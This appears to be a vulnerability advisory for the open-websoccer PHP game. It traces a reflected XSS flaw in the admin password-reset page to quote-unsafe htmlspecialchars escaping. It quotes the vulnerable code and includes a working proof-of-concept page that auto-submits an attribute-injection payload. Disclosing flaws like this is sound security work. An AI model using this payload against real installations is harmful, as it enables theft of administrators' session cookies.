vendor: ihofmann/open-websoccer: A PHP based online football/soccer manager game. (github.com)
version: <= 5.2.3
php version: 5.x
An XSS vulnerability (Cross site Scripting) (CWE-79) is in websoccer/admin/forgot-password.php.
At line 129, The $_POST['inputEmail'] is inserted into the value attribute of <input> tag and is escaped by escapeOutput,
which is actually employs htmlspecialchars($message, ENT_COMPAT, 'UTF-8') at line 30
of websoccer/admin/functions.inc.php.
However, htmlspecialchars doesn't escape ' without the ENT_QUOTES flag.
Therefore, an attacker can still exploit this by using ' to break out of value attribute and
inject other attributes within malicious Javascript code.
This allows attackers to obtain cookies of administrator and other users and fake their login using obtained cookies.
$inputEmail = (isset($_POST['inputEmail'])) ? trim($_POST['inputEmail']) : FALSE;
......
<input type='email' name='inputEmail' id='inputEmail' placeholder='E-Mail' value='<?php echo escapeOutput($inputEmail); ?>'>/**
* Escapes for HTML output. Uses <code>htmlspecialchars</code> (UTF-8).
*
* @param string $message message string to escape.
* @return string escaped input string, ready for secure HTML output.
*/
function escapeOutput($message) {
return htmlspecialchars($message, ENT_COMPAT, 'UTF-8');
}The POC is as follows:
Create a malicious webpage designed to inject JavaScript code into the target page(http://xxxx/admin/forgot-password.php):
<html>
<head>
<script>
window.onload = function() {
document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://localhost/open-websoccer/websoccer/admin/forgot-password.php">
<input id="xssr_in" type="text" style="display:none" name="inputEmail" value="' onfocus=alert(1) autofocus '" />
<div style="display:none;"><input id="postsubmit" type="submit" name="submit" value="submit" /></div>
</form>
</body>
</html>When the victim visits this malicious page, the javascript code will be executed under the target page.
